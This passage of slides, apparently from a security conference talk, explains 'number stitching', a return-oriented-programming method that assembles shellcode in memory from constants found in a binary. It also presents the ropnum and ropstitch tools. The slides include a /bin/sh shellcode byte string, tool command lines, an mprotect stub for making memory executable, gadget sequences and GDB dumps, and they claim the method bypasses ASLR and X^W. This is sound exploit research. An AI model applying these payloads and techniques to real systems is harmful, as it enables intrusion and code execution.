  • 31. Reverse process  Shellcode is represented as increasing deltas  Add delta n with n+1  Dump that delta at stack index  Repeat  We’ve copied our shellcode to our stack © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 31
  • 32. Example 1. Find address of number 0x01020304 in memory 2. Load that address into ebx 3. Add mem to reg. Eax contains 0x01020304 4. Add reg to mem at index 3. Fake stack contains “x04x03x02x01” 5. Find address of number 0x04040404 in memory and load into ebx 6. Add mem to reg. Eax contains 0x01020304 + 0x04040404 = 0x05060708 7. Add reg to mem. Fake stack contains “x08x07x06x05x04x03x02x01” 8. Repeat © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 32
  • 33. Problem  How easy is it to find the shellcode “numbers” in memory?  Does memory contain numbers such as:  0x01020304  "x6ax31x58x99” => 0x66a7ce96 (string to 2’s complement integer)  If not, how can we build those numbers to get our shellcode? © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 33
  • 34. Stitching numbers © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 34
  • 35. Answers  It’s not easy to find “big” numbers in memory  Shellcode chunks are big numbers  Example: looking for 0x01020304: someone@something:~/somewhere$ gdb hw gdb-peda$ peda searchmem 0x01020304 .text Searching for '0x01020304' in: .text ranges Not found  In short, not many large numbers in memory © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 35
  • 36. Approach  Scan memory regions in ELF:  RO segment (contains .text, .rodata, …) is a good candidate:  Read only so should not change at runtime  If not PIE, addresses are constant  Keep track of all numbers found and their addresses  Find the best combination of numbers which add up to a chunk © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 36
  • 37. Coin change problem  This is called the coin change problem  If I buy an item at 4.25€ and pay with a 5€ note  What’s the most efficient way to return change?  0.75€ change:  1 50 cent coin  1 20 cent coin  1 5 cent coin © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 37
  • 38. In hex you’re a millionaire  In dollars, answer is different  0.75$:  1 half-dollar coin  1 quarter  Best solution depends on the coin set  Our set of coins are the numbers found in memory © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 38
  • 39. Solving the problem  Ideal solution to the problem is using Dynamic Programming:  Finds most efficient solution  Blows memory for big numbers  I can’t scale it for big numbers yet  Sub-optimal solution is the greedy approach:  No memory footprint  Can miss the solution  Look for the biggest coin which fits, then go down  Luckily small numbers are easy to find in memory, meaning greedy will always succeed © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 39
  • 40. Greedy approach  75 cents change example:  Try 2 euros ✖  Try 1 euro ✖  Try 50 cents ✔  Try 20 cents ✔  Try 10 cents ✖  Try 5 cents ✔  Found solution: © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 40
  • 41. Introducing Ropnum  Tool to find a solution to the coin change problem  Give it a number, will get you the address of numbers which solve the coin change problem  Can also:  Ignore addresses with null-bytes  Exclude numbers from the coin change solver  Print all addresses pointing to a number  … © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 41
  • 42. Usage  Find me:  The address of numbers…  In the segment containing the .text section  Which added together solve the coin change problem (i.e.: 0x01020304) someone@something:~/somewhere$ ropnum.py -n 0x01020304 -S -s .text hw 2> /dev/null Using segments instead of sections to perform number lookups. Using sections [.text] for segment lookup. Found loadable segment starting at [address 0x08048000, offset 0x00000000] Found a solution using 5 operations: [16860748, 47811, 392, 104, 5] 0x08048002 => 0x0101464c 16860748 0x0804804c => 0x00000005 5 0x080482f6 => 0x00000068 104 0x08048399 => 0x0000bac3 47811 0x08048500 => 0x00000188 392 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 42
  • 43. Ropnum continued  Now you can use an accumulating gadget on the found addresses someone@something:~/somewhere$ ropnum.py -n 0x01020304 -S -s .text hw 2> /dev/null Found a solution using 5 operations: [16860748, 47811, 392, 104, 5] 0x08048002 => 0x0101464c 16860748 0x0804804c => 0x00000005 5 0x080482f6 => 0x00000068 104 0x08048399 => 0x0000bac3 47811 0x08048500 => 0x00000188 392 someone@something:~/somewhere$ python -c 'print hex(0x00000188+0x0000bac3+0x00000068+0x00000005+0x0101464c)' 0x1020304  add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;;  By controlling the value addressed by ebx, you control eax © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 43
  • 44. Putting it together © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 44
  • 45. Summary  Cut and order 4 byte shellcode chunks  Add numbers found in memory together until you reach a chunk  Once a chunk is reached, dump it to a stack frame  Repeat until shellcode is complete  Transfer control to shellcode  Git it at https://github.com/alexmgr/numstitch © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 45
  • 46. Introducing Ropstitch  What it does:  Takes an input shellcode, and a frame address  Takes care of the tedious details (endianess, 2’s complement, padding, … )  Spits out some python code to generate your payload  Additional features:  Add an mprotect RWE stub frame before your stack  Start with an arbitrary accumulator register value  Lookup numbers in section or segments © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 46
  • 47. Why do you need an mprotect stub  The fake stack lives in a RW section  You need to make that page RE  Mprotect allows to change permissions at runtime  The mprotect stub will change the permissions of the page to allow shellcode execution  Mprotect(page base address, page size (0x1000), RWE (0x7)) © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 47
  • 48. Example usage  Generate a python payload:  To copy a /bin/sh shellcode:  To a fake frame frame located at 0x08049110 (.data section)  Appending an mprotect frame (default behaviour)  Looking up numbers in RO segment  In binary abinary someone@something:~/somewhere$ ropstitch.py -x "x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0x0bx52x68x6ex2fx73x6 8x68x2fx2fx62x69x89xe3x89xd1xcdx80" -f 0x08049110 -S -s .text -p abinary 2> /dev/null © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 48
  • 49. Example tool output  The tool will spit out some python code, where you need to add your gadget addresses  Then run that to get your payload  Output is too verbose. See an example and further explanations on numstitch_details.txt (Defcon CD) or here: https://github.com/alexmgr/numstitch © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 49
  • 50. GDB output gdb-peda$ x/16w 0x804a11c 0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00000000 0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000 0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a14c: 0x00000000 0x00000000 0x00000000 0x00000000 gdb-peda$ # Writing int 0x80. Notice that the numbers are added in increasing order: 0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00000000 0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000 0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000 gdb-peda$ # Writing mprotect page size (0x1000). Notice that the numbers are added in increasing order: 0x804a11c: 0xb7f31e00 0x00000000 0x00000000 0x00001000 0x804a12c: 0x00000007 0x00000000 0x00000000 0x00000000 0x804a13c: 0x00000000 0x00000000 0x00000000 0x00000000 0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000 gdb-peda$ c 10 gdb-peda$ # later execution (notice the missing parts of shellcode, which will be filed in later, once eax reaches a slice value): 0x804a11c: 0xb7f31e00 0x0804a130 0x0804a000 0x00001000 0x804a12c: 0x00000007 0x00000000 0x2d686652 0x52e18970 0x804a13c: 0x2f68686a 0x68736162 0x6e69622f 0x5152e389 0x804a14c: 0x00000000 0x00000080 0x00000000 0x00000000 gdb-peda$ # end result (The shellcode is complete in memory): 0x804a11c: 0xb7f31e00 0x0804a130 0x0804a000 0x00001000 0x804a12c: 0x00000007 0x99580b6a 0x2d686652 0x52e18970 0x804a13c: 0x2f68686a 0x68736162 0x6e69622f 0x5152e389 0x804a14c: 0xcde18953 0x00000080 0x00000000 0x00000000 © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 50
  • 51. Pros and cons © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 51
  • 52. Number stitching  Pros:  Can encode any shellcode (no null-byte problem)  Lower 2 bytes can be controlled by excluding those values from the addresses  Not affected by RELRO, ASLR or X^W  Cons:  Payloads can be large, depending on the availability of number  Thus requires a big stage-0, or a gadget table © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 52
  • 53. Further usage © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 53
  • 54. Initialize eax  What if the value of eax changes between runtimes?  In stdcall convention, eax holds the return value of a function call  Just call any function in the PLT  There is a good chance you control the return value that way © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 54
  • 55. Shrink the size of the stage-0  Number stitching can also be used to load further gadgets instead of a shellcode  Concept of a gadget table  Say you need:  Pop ecx; ret; => 59 c3  Pop ebx; ret; => 5b c3  mov [ecx] ebx; ret; => 89 19 c3  Your shellcode becomes: “x59xc3x5bxc3x89x19xc3” © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 55
  • 56. Gadget table  Number stitching can transfer those bytes to memory  ropstitch can change the memory permissions with the mprotect stub  You can then just call the gadgets from the table as if they we’re part of the binary  You have the ability to load any gadget or byte in memory  This is not yet automated in the tool © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 56
  • 57. Future work © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 57
  • 58. General  Search if there are numbers in memory not subject to ASLR:  Check binaries with PIE enabled to see if anything comes up  By definition, probably wont come up with anything, but who knows?  Search for gadgets in new versions of libc/gcc. Seems difficult, but might yield a new approach © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 58
  • 59. Tooling  Get dynamic programming approach to work with large numbers:  Challenging  64 bit support. Easy, numbers are just bigger. Mprotect stack might be harder because of the different ABI  Introduce a mixed approach:  String copying for bytes available  Number stitching for others  Maybe contribute it to some rop tools (if they’re interested)  Simplify the concept of gadget tables in the tool © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 59
  • 60. Contact details © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 60
  • 61. Alex Moneger  amoneger@cisco.com  https://github.com/alexmgr/numstitch © 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 61

Notes de l'éditeur

  1. Exploit vulnerabilities with ASLR and X^W on Natural evolution Use it because you have to, don’t if you can’t
  2. Why ret, out of scope, but to keep control of execution flow
  3. ----- Meeting Notes (10/08/2014 13:12) ----- And linker options
  4. Trailing gadget ueless